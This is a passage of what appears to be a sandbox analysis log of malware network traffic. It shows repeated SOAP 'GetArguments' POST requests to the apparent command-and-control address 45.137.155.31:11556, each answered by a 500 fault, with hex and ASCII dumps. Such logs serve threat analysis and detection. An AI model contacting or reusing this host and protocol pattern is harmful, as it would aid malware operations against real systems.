65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:09.027188063 CEST10617OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:09.113158941 CEST10617INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:09.182266951 CEST10618INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:08 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:10.198681116 CEST10618OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:10.296838999 CEST10618INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:10.368463039 CEST10620INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:09 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:11.385880947 CEST10620OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:11.456250906 CEST10620INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:11.526104927 CEST10621INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:11 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:12.542252064 CEST10621OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:12.611979008 CEST10621INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:12.683219910 CEST10623INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:12 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:13.703249931 CEST10623OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:13.796703100 CEST10623INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:13.889261961 CEST10624INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:13 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:14.902769089 CEST10624OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:14.971916914 CEST10624INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:15.041310072 CEST10626INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:14 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:16.058588982 CEST10626OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
